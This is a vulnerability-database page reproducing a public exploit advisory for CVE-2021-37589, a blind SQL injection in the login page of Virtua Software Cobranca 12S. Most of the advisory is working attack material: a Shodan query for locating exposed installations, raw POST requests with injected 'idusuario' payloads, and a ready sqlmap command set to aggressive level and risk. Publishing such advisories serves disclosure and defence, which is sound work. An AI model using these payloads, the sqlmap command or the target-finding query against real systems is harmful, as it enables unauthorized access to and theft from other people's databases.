Lucene search
K

Virtua Software Cobranca 12S SQL Injection

🗓️ 19 Jun 2022 00:00:00Reported by Luca RegneType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 255 Views

Virtua Software Cobranca 12S SQL Injection vulnerability allows remote attackers to execute arbitrary SQL commands through the idusuario parameter in the Login Page

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Virtua Software Cobranca 12S - SQL injection Vulnerability
14 Jun 202200:00
zdt
GithubExploit
Exploit for SQL Injection in Virtuasoftware Cobranca
28 Jul 202110:27
githubexploit
Circl
CVE-2021-37589
7 Jun 202218:31
circl
CNNVD
Virtua Cobranca SQL注入漏洞
7 Jun 202200:00
cnnvd
CNVD
Virtua SQL注入漏洞 charging
16 Jun 202200:00
cnvd
CVE
CVE-2021-37589
7 Jun 202213:49
cve
Cvelist
CVE-2021-37589
7 Jun 202213:49
cvelist
Exploit DB
Virtua Software Cobranca 12S - SQLi
14 Jun 202200:00
exploitdb
Nuclei
Virtua Software Cobranca <12R - Blind SQL Injection
8 Jun 202604:09
nuclei
NVD
CVE-2021-37589
7 Jun 202214:15
nvd
Rows per page
`# Exploit Title: Virtua Software Cobranca 12S - SQLi  
# Shodan Query: http.favicon.hash:876876147  
# Date: 13/08/2021  
# Exploit Author: Luca Regne  
# Vendor Homepage: https://www.virtuasoftware.com.br/  
# Software Link: https://www.virtuasoftware.com.br/downloads/Cobranca12S_13_08.exe  
# Version: 12S  
# Tested on: Windows Server 2019  
# CVE : CVE-2021-37589  
------------------------------------------------------------------------  
  
  
## Description   
A Blind SQL injection vulnerability in a Login Page (/controller/login.php) in Virtua Cobranca 12S version allows remote unauthenticated attackers to get information about application executing arbitrary SQL commands by idusuario parameter.   
  
## Request PoC  
```  
POST /controller/login.php?acao=autenticar HTTP/1.1  
Host: redacted.com  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 37  
Connection: close  
Cookie: origem_selecionado=; PHPSESSID=  
  
idusuario='&idsenha=awesome_and_unprobaly_password&tipousr=Usuario  
  
```  
  
This request causes an error 500. Changing the idusuario to "'+AND+'1'%3d'1'--" the response to request was 200 status code with message of authentication error.   
  
```  
POST /controller/login.php?acao=autenticar HTTP/1.1  
Host: redacted.com  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 37  
Connection: close  
Cookie: origem_selecionado=; PHPSESSID=  
  
idusuario='+AND+'1'='1'--&idsenha=a&tipousr=Usuario  
  
```  
  
## Exploit  
Save the request from burp to file   
```bash  
python3 sqlmap.py -r ~/req-virtua.txt -p idusuario --dbms firebird --level 5 --risk 3 --random-agent  
```  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Jun 2022 00:00Current
1Low risk
Vulners AI Score1
CVSS 25
CVSS 3.17.5
EPSS0.77715
255